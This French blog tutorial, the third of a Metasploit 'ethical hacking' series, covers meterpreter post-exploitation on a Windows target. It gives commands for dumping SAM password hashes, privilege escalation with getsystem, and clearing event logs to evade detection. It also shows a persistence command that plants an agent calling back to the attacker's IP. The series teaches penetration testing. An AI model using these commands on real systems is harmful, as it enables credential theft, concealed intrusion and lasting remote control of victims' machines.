Dans la partie 1sur3 et 2sur3 on a pu avoir une session meterpreter sur notre machine ce qui nous a offert un contrôle total sur la machine distante sur Active Directory (ou sous Windows 10), et à ce point-là, on avait finis avec la phase de l’exploitation. Dans ce tuto, nous allons aborder la phase de post-exploitation dont le principal joueur est meterpreter.
En fait, meterpreter est un payload qui une fois exécuté sur le système cible nous donne un shell interactif, autrement dit meterpreter est une sorte d’extension du framework qui nous permet de récupérer les hashs, pivoter et migrer entre les processus, manipuler les fichiers et beaucoup d’autre fonctionnalités.
Metasploit tutorial francais hacking ethique: COMMANDES DE BASES
Si vous vous rappelez, le dernier tuto on a pu avoir une session meterpreter
Déjà, comme vous le voyez dans la capture ci-dessus, j’ai utilisé la commande sysinfo pour avoir une idée sur l’OS que j’ai hacké. MAIS Voyons comment extraire plus d’informations en utilisant des commandes basiques.
La première commande qu’il faut impérativement savoir, c’est la commande “help”, cette commande vous fournit toutes les commandes qu’ils sont à votre porté sur meterpreter :
Vous voyez que c’est vraiment riche en commandes, pratiquement c’est tout ce que vous en avez besoin pour interagir avec meterrpeter mais nous allons voir ensemble celles qui sont les plus utilisées.
Metasploit tutorial francais hacking ethique: screenshot
Juste pour vous faire plaisir ?, la commande screenshot vous permet de prendre une capture d’écran de la machine victime :
C’est une excellente façon d’étudier le système, par exemple dans notre cas, on voit bien que notre cible est “PROTÉGER” par un antivirus AVAST (nous devons être plus prudents dans ce cas), et que python est installé (au cas où on veut pivoter ?), bref, c’est très utile, mais pas suffisant.
Metasploit tutorial francais hacking ethique: Ps
La commande ps fourni une liste des processus en cours d’exécution, cela est très important, notamment quand vous voulez migrer d’un service que vous avez exploiter (internet_explorer dans notre cas) vers un autre plus stable ce qui diminue le risque de coupure de notre session au moment de la fermeture du service exploité (en cas de fermeture ou crash du navigateur par exemple).
Pour migrer, il suffit d’utiliser la commande “migrate“ suivi du numéro du processus PID, dans l’exemple suivant je vais déplacer le processus de mon payload vers le processus VBoxTray.exe(PID=1492) :
Metasploit tutorial francais hacking ethique: Dump
Maintenant et que vous êtes habitué avec votre environnement, il ne vous reste qu’a récupérer les hashs stocké dans le système. Cependant, vous avez le choix d’utiliser le keylogger fournit par meterpreter ainsi que d’autre informations confidentielles.
Tout d’abord verifiez l’autorité que vous avez sur le systéme en executant la commande “getuid” :
Vous voyez que je suis entrain d’exécuter les commandes en tant qu’ADIMINISTRATEUR (super utilisateur) et c’est exactement ce que nécessite la commande hashdump afin qu’elle puisse bypasser les restrictions du registre du système et récupérer les hashs depuis le gestionnaire de compte SAM :
D’habitude, Microsoft enregistre les hashs dans LAN Manager(LM) et NT LAN MANAGER (NTLM).
Dans le cas du stockage LAN, si le mot de passe entré par l’utilisateur est fait de 14 caractères, il peut être divisé en deux valeurs de 7 caractères puis chaque valeur est hashé séparément, de cette façon le hacker n’a qu’a cracker que 2 mots de passe de 7 caractère ce qui facilite énormément les choses.
Cependant, le stockage type NTLM hash directement le mot de passe quel qu’il soit et il l’enregistre dans le SAM (security account manager).
N.B : on peut cracker un mot de passe avec python.
Ce que vous devez savoir, c’est que tout hash qui commence avec la valeur aad3b435 reflète un hash de valeur NUL ! Et si vous contemplez le hash que j’ai récupéré de la base SAM vous trouverez que c’est le cas.
Metasploit tutorial francais hacking ethique: Élévation de privilège
Dans certaines situations, vous arrivez à exploiter une machine avec peu de pouvoir, dans ce cas-là vous devez procédez à une élévation de privilèges (privilige escalation), mais il faut savoir que cet objectif (d’enlever les restrictions) n’est pas toujours facile et peu vite se compliquer en fonction de votre terrain.
La premier commande à essayer, c’est “getsystem” :
Voila, maintenant on est authorité (rien ne peut vous faire face ?).
Pour revenir au compte précèdent exécutez la commande “rev2self” comme suit :
Metasploit tutorial francais hacking ethique: Clearev
Cette commande vous permet d’effacer le journal d’évenement, il faut être vigilant en conductant vos tests d’intrusion, car s’introduire dans un système est simple, ce qui demande des compétences c’est de passer inaperçue.
Cette commande ne fait pas tout le travail, il va falloir aussi nettoyer le registre.
Metasploit tutorial francais hacking ethique: Meterpreter scripts
Meterpreter est équipé de plusieurs scripts externe que vous pouvez appelez, ces derniers peuvent vous aider à accomplir des tâches prédéfinies (et parfois complexes).
N.B : certains scripts obsolètes et ne sont pas assez stables, mais je ne vais démontrer que celle qui ont marché avec moi.
Pour exécuter un script entrez la commande “run nom_du_script”.
Une des fonctionnalités qu’aime les newbies est l’intéraction avec la machine victime via une interface graphique, vous pouvez le faire en utilisant un script qui va faire en sorte de créer un tunnel de communication entre les deux machine par le biais du protocole VNC (virtual network computing).
La commande est simple “run vnc” va installer une session vnc sur la machine distante, en conséquence une fenêtre VNC devrait apparaître montrant le bureau de la machine victime :
Metasploit tutorial francais hacking ethique: Persistance
Il ne faut pas oublier que jusque-là votre session meterpreter peut se déconnecté à n’importe quel moment, pour cela vous devez ancrer votre serveur dans le système ?, c’est ce qu’on appelle persistance , de cette façon même si la machine distante se déconnecte ou le système d’exploitation crash vous aurez toujours une connexion inverse depuis l’agent que vous avez planter.
Voici la syntaxe que j’utilise
Run persistence -X -i 20 -p 4444 -r IP_ADRESSE
Sachant que :
• persistence : c’est le nom du script
• -X : démarage automatique de l’agent
• -i 20 : l’agent retentit chaque 20 secondes détablir une connexion.
• -p 4444 : tentation de connexion sur le port 4444
• -r VOTRE_IP : l’IP adresse de la machine du hacker.
Maintenant, si votre machine se redémarre, automatiquement une connexion inverse va s’établir grâce à votre agent persistant.
Note : pour voir le processus de création d’un payload inétectable par les antivirus vous pouvez visualiser cet article
Voilà, jusque-là, vous avez acquis les bases pour comprendre comment meterpreter fonctionne et vous avez eu une idée sur sa puissance, et au fil de votre pratique vous allez apprendre de nouvelles techniques et pourquoi pas créer vos propres scripts et contribuez au développement de Metasploit.
Voir les 2 autres parties de ce Metasploit tutorial francais hacking ethique :
metasploit-tutorial-francais-hacking-ethique-1-sur-3
metasploit-tutorial-francais-hacking-ethique-2-sur-3
Cet article reflète exclusivement l'opinion de ses auteurs et n’engage en aucune façon Consultingit. J'espère que ça vous a plu. Vos commentaires/remarques sont les bienvenus: